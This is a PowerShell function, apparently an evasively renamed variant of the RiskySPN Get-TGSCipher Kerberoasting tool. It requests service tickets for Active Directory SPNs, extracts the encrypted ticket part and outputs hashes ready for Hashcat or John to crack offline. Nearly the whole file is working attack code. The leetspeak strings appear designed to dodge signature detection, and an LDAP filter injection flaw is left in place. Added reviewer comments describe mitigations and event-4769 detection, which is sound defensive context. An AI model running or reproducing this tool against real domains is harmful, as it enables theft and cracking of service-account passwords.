function Invoke-SPNS
{
<#
.SYNOPSIS
Requests a Kerberos service ticket (TGS) for each supplied SPN and returns the
ticket's encrypted part, optionally reformatted as password-cracker input.

.DESCRIPTION
This is the Kerberoasting pattern: any authenticated domain principal may ask the
KDC for a service ticket to any registered SPN, and a ticket issued with RC4-HMAC
(etype 23) is keyed from the service account's password hash, which is why such
tickets are collected for offline guessing. The function itself only obtains the
ticket, carves the EncTicketPart out of the raw AP-REQ bytes and reformats it.

Reviewer context (not derived from this code):
- Mitigation: long random passwords or gMSA for service accounts, and AES-only
  service accounts (msDS-SupportedEncryptionTypes) so RC4 tickets are never issued.
- Detection: the DC audits the ticket request as Security event 4769; an RC4
  ticket encryption type (0x17) and many distinct SPNs requested by one account in
  a short window are the usual hunting signals. A honey SPN on an unused account
  turns any request for it into a high-fidelity alert.
- The mixed-case parameter names and leetspeak message strings differ from the
  upstream RiskySPN Get-TGSCipher this appears to derive from, presumably to defeat
  string signatures; detection should key on the behaviour above, not on strings.

.PARAMETER sPn
Service Principal Name to request a ticket for, in the usual service/host form.
Accepted from the pipeline, one per Process invocation.

.PARAMETER fOrMaT
Optional output format: "Hashcat", "John" or "Kerberoast". When omitted, the
psobjects built in Process are returned unchanged.

.PARAMETER NoQuery
Skip the Global Catalog lookup that resolves each SPN to its owning account's UPN;
Target is then reported as "N/A".

.OUTPUTS
An array of psobject (SPN, Target, EncryptionType, EncTicketPart), or the
formatted lines when -fOrMaT is given. Write-Error is raised when no ticket was
parsed at all.
#>
[CmdletBinding()]
param
(
[parameter(Mandatory=$True, Position=0, ValueFromPipeline=$True)]
[ValidateNotNullOrEmpty()]
[string]$sPn,
[parameter(Mandatory=$false, Position=1)]
[ValidateSet("Hashcat","John", "Kerberoast")]
[string]$fOrMaT,
[Switch]$NoQuery
)
Begin {
if (!$NoQuery)
{
# Build a Global Catalog searcher rooted at the forest root domain
# (each "." in the domain name becomes ",DC="); Process uses it to resolve
# every SPN to the account that owns it.
$Forest = [System.DirectoryServices.ActiveDirectory.Forest]::GetCurrentForest()
$Path = 'GC://DC=' + ($Forest.RootDomain -Replace ("\.",',DC='))
$Searcher = New-Object System.DirectoryServices.DirectorySearcher([ADSI]$Path)
$Searcher.PropertiesToLoad.Add("userprincipalname") | Out-Null
}
# KerberosRequestorSecurityToken (used in Process) lives in System.IdentityModel.
Add-Type -AssemblyName System.IdentityModel
# One result object per successfully parsed ticket.
$a = @()
Write-Verbose "sT@Rt1Ng 2 R3qU3sT SpNs"
}
Process {
$ta = "N/A"
if (!$NoQuery) {
# NOTE(review): $sPn is interpolated unescaped into the LDAP filter, so an SPN
# containing filter metacharacters ('*', '(', ')') changes the query instead of
# being matched literally. FindOne() returning no entry leaves $ta empty.
$Searcher.Filter = "(servicePrincipalName=$sPn)"
$ta = [string]$Searcher.FindOne().Properties.userprincipalname
}
Write-Verbose "Asking for TGS for the SpN: $sPn"
$ByteStream = $null
try {
# GetRequest() returns the AP-REQ bytes for $sPn, i.e. a service ticket is
# obtained from the KDC under the current logon session. On the DC this is the
# request audited as Security event 4769 (when service-ticket auditing is on).
$Ticket = New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList $sPn
$ByteStream = $Ticket.GetRequest()
}
catch {
Write-Warning "Could not request a TGS 4 SPN: $sPn - Does it exists?"
Write-Verbose "Make sure the SPN: $sPn is registed on Active Directory"
}
if ($ByteStream)
{
# Work on the AP-REQ as one uppercase hex string with the "-" separators removed.
$HexStream = [System.BitConverter]::ToString($ByteStream) -replace "-"
# "A0030201" is the DER prefix of an EncryptedData etype field ([0] INTEGER of
# length 1). The greedy ".*" anchors on the LAST occurrence in the stream, and the
# two hex digits that follow it are taken as the etype value.
$eType = [Convert]::ToInt32(($HexStream -replace ".*A0030201")[0..1] -join "", 16)
# Human-readable etype. Only 23 (RC4-HMAC) is handled by the formatters in End;
# 1 and 3 are the legacy DES types that modern domains should have disabled.
$EncType = switch ($eType) {
1 {"DES-CBC-CRC (1)"}
3 {"DES-CBC-MD5 (3)"}
17 {"AES128-CTS-HMAC-SHA-1 (17)"}
18 {"AES256-CTS-HMAC-SHA-1 (18)"}
23 {"RC4-HMAC (23)"}
default {"Unknown ($eType)"}
}
try {
# Carve the cipher bytes by regex rather than by an ASN.1 parser: drop everything
# through the first OCTET STRING with a two-byte length below 0x1000 ("04820xxx"),
# then split on "A48201" (a [4] tag with a two-byte length in the 0x01xx range).
# This depends on the exact DER layout; a ticket of unexpected shape ends up in
# the catch below.
[System.Collections.ArrayList]$Parts = ($HexStream -replace '^(.*?)04820...(.*)','$2') -Split "A48201"
if ($Parts.Count -gt 2) {
# More than two pieces: presumably the marker also occurred inside the cipher
# text, so the last piece is discarded and the rest re-joined with the marker.
$Parts.RemoveAt($Parts.Count - 1)
$EncPart = $Parts -join "A48201"
}
else {
$EncPart = $Parts[0]
}
# Select-Object pins the property order of the result object.
$Target = New-Object psobject -Property @{
SPN = $sPn
Target = $ta
EncryptionType = $EncType
EncTicketPart = $EncPart
} | Select-Object SPN,Target,EncryptionType,EncTicketPart
$a += $Target
}
catch {
Write-Warning "Couldn't extract the EncTicketPart of SpN: $sPn - purge the ticket and try again"
}
}
}
End {
# Member access on an empty array yields $null, so this means "no ticket parsed".
if (!$a.EncTicketPart) {
Write-Error "FAIL! No Tickets.."
}
elseif ($fOrMaT)
{
$Output = @()
Write-Verbose "Converting $($a.Count) tickets to $fOrMaT format"
foreach ($Target in $a) {
# Only RC4-HMAC tickets are emitted; AES/DES tickets are reported and skipped.
if ($Target.EncryptionType -eq "RC4-HMAC (23)") {
if ($fOrMaT -eq "Kerberoast") {
# Raw EncTicketPart hex per ticket; the [string] cast turns $Output into one string.
[string]$Output += $Target.EncTicketPart + "\n"
}
elseif (($fOrMaT -eq "John") -or ($fOrMaT -eq "Hashcat")) {
# $krb5tgs$23$*user$realm$spn*$checksum$cipher: user/realm are the two halves of
# the UPN resolved in Process (with -NoQuery the user is "N/A" and realm empty);
# the first 16 bytes (32 hex digits) of RC4-HMAC cipher text are the checksum.
$ac = $Target.Target -split "@"
$Output += "`$krb5tgs`$23`$*$($ac[0])`$$($ac[1])`$$($Target.SPN)*`$" + $Target.EncTicketPart.Substring(0,32) + "`$" + $Target.EncTicketPart.Substring(32)
}
}
else {
Write-Warning "tHe T1cK3T 0f SpN: $($Target.SPN) is 3nCrYpT3D with $($Target.EncryptionType) 3nCrYpT1oN & cAnT B cR@cK3D W1tH $fOrMaT. Currently only RC4-HMAC is supported)"
}
}
}
else {
# No format requested: return the psobjects as collected.
$Output = $a
}
Write-Verbose "returning $($Output.Count) tickets"
return $Output
}
}